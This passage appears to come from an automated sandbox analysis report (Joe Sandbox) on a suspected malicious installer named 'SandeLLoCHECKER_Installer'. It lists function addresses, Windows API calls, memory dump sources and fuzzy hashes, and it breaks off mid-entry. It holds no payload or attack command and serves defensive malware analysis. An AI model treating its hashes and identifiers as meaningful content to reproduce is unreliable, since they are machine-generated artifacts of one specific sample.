                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00A3028A,?,?,00000000,?,00000000), ref: 00A2FF5A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2568140703-0
                                                                                                                        • Opcode ID: f910ed5145a1d4a724a3509f0603a96918e1b452ccdad3c069f6a87bfa3967ce
                                                                                                                        • Instruction ID: 528584ae2cd9f981fba2993644334f16dbbfb25de92fbf3615ecedabbf50b879
                                                                                                                        • Opcode Fuzzy Hash: f910ed5145a1d4a724a3509f0603a96918e1b452ccdad3c069f6a87bfa3967ce
                                                                                                                        • Instruction Fuzzy Hash: 7AF0683610012ABFCF126F94ED05ADE3E26AB48760B058125BA2865120CA32D872AB94
                                                                                                                        Function 00949600 Relevance: 2.6, APIs: 2, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000003,00000000,00986984,000000FF,00000000,00000000,00000000,00AAC2BE,?,00986984,00AAC2BE), ref: 00949618
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000003,00000000,00986984,000000FF,?,-00000001,?,00986984,00AAC2BE), ref: 0094964A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 626452242-0
                                                                                                                        • Opcode ID: 49be2a9afdb170f6a846055442c98f7ead4e6a5f814e19af61aad81cc75530f8
                                                                                                                        • Instruction ID: 3a43008ac7e68ad9958614106f4e6198e0ce678130e3d1ae4c7f2bf9fd5d6eca
                                                                                                                        • Opcode Fuzzy Hash: 49be2a9afdb170f6a846055442c98f7ead4e6a5f814e19af61aad81cc75530f8
                                                                                                                        • Instruction Fuzzy Hash: 0501D232301211AFE6149B8DDC89F1EB759EFD4721F21422AF715EB2D0CE606C1287A5
                                                                                                                        Function 009FBE00 Relevance: 1.7, APIs: 1, Instructions: 225COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 10a4165fe97d7a423e3f9cfcbeb697dacf8a805d991e16647a1cb0cfdfa4f9d4
                                                                                                                        • Instruction ID: 0cd5ee52f61da6c97eae255c65db2318a716d103bcac14a60e3e6819742228e1
                                                                                                                        • Opcode Fuzzy Hash: 10a4165fe97d7a423e3f9cfcbeb697dacf8a805d991e16647a1cb0cfdfa4f9d4
                                                                                                                        • Instruction Fuzzy Hash: DBA159B1900708DFDB10CFA4D584B9ABBF4FF09314F14865EE85AAB391D775AA04CB91
                                                                                                                        Function 009A5BA0 Relevance: 1.7, APIs: 1, Instructions: 169synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,C7BA013E,?,?,?), ref: 009A5BD4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 24740636-0
                                                                                                                        • Opcode ID: ee41ba88222db79ce4d56e2226d84f8ac18c8fbe29153a2afd7a42c1fb7330ef
                                                                                                                        • Instruction ID: 8ead117fda8f658fcb8b992d59f09ad413cb1d9ccc33a5c956383013ce75ee85
                                                                                                                        • Opcode Fuzzy Hash: ee41ba88222db79ce4d56e2226d84f8ac18c8fbe29153a2afd7a42c1fb7330ef
                                                                                                                        • Instruction Fuzzy Hash: 94514671B006169FCB14CF68C988B6EBBB5FB49710F2685A9E815AB391D731ED01CBD0
                                                                                                                        Function 00A35B4E Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(E8458D00,?,00A35D9D,00A35D91,00000000), ref: 00A35B80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Info
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1807457897-0
                                                                                                                        • Opcode ID: 762f36f0e9d1606d6951bfbcd8692ce0f6cc9a26593b5dd84b9d789704f291aa
                                                                                                                        • Instruction ID: 5797476250fb54841b497fb742056b59e9842af813f3081258fb72eb5ba8b311
                                                                                                                        • Opcode Fuzzy Hash: 762f36f0e9d1606d6951bfbcd8692ce0f6cc9a26593b5dd84b9d789704f291aa
                                                                                                                        • Instruction Fuzzy Hash: A95124719047589FDB218F3CCD84AE6BBB8EB46308F2405E9F59AC7142D234AE46DF20
                                                                                                                        Function 0098A500 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnumResourceLanguagesW.KERNEL32(?,00000010,00000001,0098A630,?), ref: 0098A54B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumLanguagesResource
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4141015960-0
                                                                                                                        • Opcode ID: 257445f0ced432395ff1e25554a107f7d848cc0626d8c6e566671fbb55081b14
                                                                                                                        • Instruction ID: 269bb6ca2f8d184fe74eb8a2b9ca49b278193af78a799c151cd7eeea3a11e4f7
                                                                                                                        • Opcode Fuzzy Hash: 257445f0ced432395ff1e25554a107f7d848cc0626d8c6e566671fbb55081b14
                                                                                                                        • Instruction Fuzzy Hash: D141907190020A9FEB10DFA4C884BDEBBF4FF44314F10062AE421A7781DBB5A945CB91
                                                                                                                        Function 009659D0 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00965C40: __Init_thread_footer.LIBCMT ref: 00965CB6
                                                                                                                          • Part of subcall function 00A162A2: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162AD
                                                                                                                          • Part of subcall function 00A162A2: LeaveCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162EA
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00965AB0
                                                                                                                          • Part of subcall function 00A16258: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16262
                                                                                                                          • Part of subcall function 00A16258: LeaveCriticalSection.KERNEL32(00B2FE4C,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16295
                                                                                                                          • Part of subcall function 00A16258: RtlWakeAllConditionVariable.NTDLL ref: 00A1630C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterInit_thread_footerLeave$ConditionVariableWake
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 984842325-0
                                                                                                                        • Opcode ID: 8f87bab83ac41e468eda88b6ac0120cc18be4babdd31d65b16043651bee3b239
                                                                                                                        • Instruction ID: 9529da77c1e53ef62c3b7ea43b56ca758c7670010225c94ad96e08640195b2b0
                                                                                                                        • Opcode Fuzzy Hash: 8f87bab83ac41e468eda88b6ac0120cc18be4babdd31d65b16043651bee3b239
                                                                                                                        • Instruction Fuzzy Hash: D531DD71A04A44BBD710DF44EC82B89B7A4FB01B24F70D369E491977D0EFB668848B55
                                                                                                                        Function 0084B250 Relevance: 1.6, APIs: 1, Instructions: 74windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 0084B2E4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: 870464d10d12f105b9b8ff43dc878f60944ab27b089bd2be0a027fedde419263
                                                                                                                        • Instruction ID: b784b3af8ec9388b45c5542a6c944498cb47cd11dac508d938b3503a254c63e4
                                                                                                                        • Opcode Fuzzy Hash: 870464d10d12f105b9b8ff43dc878f60944ab27b089bd2be0a027fedde419263
                                                                                                                        • Instruction Fuzzy Hash: 7F219F70A01209EFCF14CFB5C858BAEBBB4FF48714F10465DE412AB690D774AA04CB90
                                                                                                                        Function 00849F90 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00A15673: EnterCriticalSection.KERNEL32(00B2FDD0,00000000,?,?,00849FC7,00000000,C7BA013E,00000000,?,00000000,?,-00000010,00A3E310,000000FF,?,0084A1A0), ref: 00A1567E
                                                                                                                          • Part of subcall function 00A15673: LeaveCriticalSection.KERNEL32(00B2FDD0,?,00849FC7,00000000,C7BA013E,00000000,?,00000000,?,-00000010,00A3E310,000000FF,?,0084A1A0,00000000,00000000), ref: 00A156AA
                                                                                                                        • FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,C7BA013E,00000000,?,00000000,?,-00000010,00A3E310,000000FF,?,0084A1A0,00000000), ref: 00849FE6
                                                                                                                          • Part of subcall function 0084A050: LoadResource.KERNEL32(00000000,00000000,C7BA013E,00000001,00000000,?,00000000,00A3DC40,000000FF,?,00849FFC,?,?,0084A1A0,00000000,00000000), ref: 0084A07B
                                                                                                                          • Part of subcall function 0084A050: LockResource.KERNEL32(00000000,?,00849FFC,?,?,0084A1A0,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A086
                                                                                                                          • Part of subcall function 0084A050: SizeofResource.KERNEL32(00000000,00000000,?,00849FFC,?,?,0084A1A0,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A094
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$CriticalSection$EnterFindLeaveLoadLockSizeof
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 529824247-0
                                                                                                                        • Opcode ID: 82d283a3a342513ff577491e806e3df994deaebc9f82a2177b98b4eddb8ba199
                                                                                                                        • Instruction ID: 41d5eec8086f7342133d27416fb2de4f54cc7263a8d6a7763f5921cd1aa32411
                                                                                                                        • Opcode Fuzzy Hash: 82d283a3a342513ff577491e806e3df994deaebc9f82a2177b98b4eddb8ba199
                                                                                                                        • Instruction Fuzzy Hash: 4811EB33F446149FD7258F59AC41B7AB3E8F7487A4F04017EED05D7380EA659C0146D1
                                                                                                                        Function 0084A190 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00849F90: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,C7BA013E,00000000,?,00000000,?,-00000010,00A3E310,000000FF,?,0084A1A0,00000000), ref: 00849FE6
                                                                                                                        • FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
                                                                                                                          • Part of subcall function 0084A050: LoadResource.KERNEL32(00000000,00000000,C7BA013E,00000001,00000000,?,00000000,00A3DC40,000000FF,?,00849FFC,?,?,0084A1A0,00000000,00000000), ref: 0084A07B
                                                                                                                          • Part of subcall function 0084A050: LockResource.KERNEL32(00000000,?,00849FFC,?,?,0084A1A0,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A086
                                                                                                                          • Part of subcall function 0084A050: SizeofResource.KERNEL32(00000000,00000000,?,00849FFC,?,?,0084A1A0,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A094
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$Find$LoadLockSizeof
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3127896203-0
                                                                                                                        • Opcode ID: 42c20f80b68f09c3ce7295c3fb68bb01bbc1ebfb31072506bafffb23d3d37872
                                                                                                                        • Instruction ID: 0978a04dd72357cb9d0084bc0e88e2389f13f4edfe873be21784a1044fe485e1
                                                                                                                        • Opcode Fuzzy Hash: 42c20f80b68f09c3ce7295c3fb68bb01bbc1ebfb31072506bafffb23d3d37872
                                                                                                                        • Instruction Fuzzy Hash: 01118C723001259BAB18ABACE88497BB39DFF88310714407AF945CF245EAA6DC1197A2
                                                                                                                        Function 009A60E0 Relevance: 1.6, APIs: 1, Instructions: 61fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000018,C7BA013E,00000018,?,00000000,?,?,00A7C5DD,000000FF), ref: 009A613B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 0bb580669c3d0c54df8942fb575ed98b0f07c4411023d574c97e079d86e4726b
                                                                                                                        • Instruction ID: 4ee8d6669eb090e44f909da1a4886b29711fee29ba1a0b54da30d933b2e88827
                                                                                                                        • Opcode Fuzzy Hash: 0bb580669c3d0c54df8942fb575ed98b0f07c4411023d574c97e079d86e4726b
                                                                                                                        • Instruction Fuzzy Hash: F5218471601208EFCB14DF64CC89F9EBBB8FB44710F144279E9159B291DB30A505CBA4
                                                                                                                        Function 0084A960 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 11c142047ab060c9490a520071031c489c429135b1207b5a8fbdd313a172f755
                                                                                                                        • Instruction ID: 33af2291f49ffc0508551cbc18d4dda96ef6c7f294a97a145323dea2fded23f3
                                                                                                                        • Opcode Fuzzy Hash: 11c142047ab060c9490a520071031c489c429135b1207b5a8fbdd313a172f755
                                                                                                                        • Instruction Fuzzy Hash: 2A014C72A48648EFC714CF54E841F2ABBB9FB59B10F10866EFC15CB750DB36A8108B54
                                                                                                                        Function 00965C40 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00A162A2: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162AD
                                                                                                                          • Part of subcall function 00A162A2: LeaveCriticalSection.KERNEL32(00B2FE4C,?,?,?,0084AC86,00B30A7C,C7BA013E,?,?,00A3E40D,000000FF,?,00985F11), ref: 00A162EA
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00965CB6
                                                                                                                          • Part of subcall function 00A16258: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16262
                                                                                                                          • Part of subcall function 00A16258: LeaveCriticalSection.KERNEL32(00B2FE4C,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16295
                                                                                                                          • Part of subcall function 00A16258: RtlWakeAllConditionVariable.NTDLL ref: 00A1630C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2296764815-0
                                                                                                                        • Opcode ID: 2fa8a69680b0f6690d76fa4f48f01874368d92060f1949f7f55219b34b32d9ec
                                                                                                                        • Instruction ID: f3bdf72ce112dfc2a84af4c56c3392f50c8c4ccdd13e8cf0eb0ed030390d0915
                                                                                                                        • Opcode Fuzzy Hash: 2fa8a69680b0f6690d76fa4f48f01874368d92060f1949f7f55219b34b32d9ec
                                                                                                                        • Instruction Fuzzy Hash: 0201A271A44A44EBD720DB58DD43B49B3E4E705B20F2087A9E825D77D0EB7869008A41
                                                                                                                        Function 0084A8A0 Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00A17B2A: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,8000000B,C7BA013E), ref: 00A17B8A
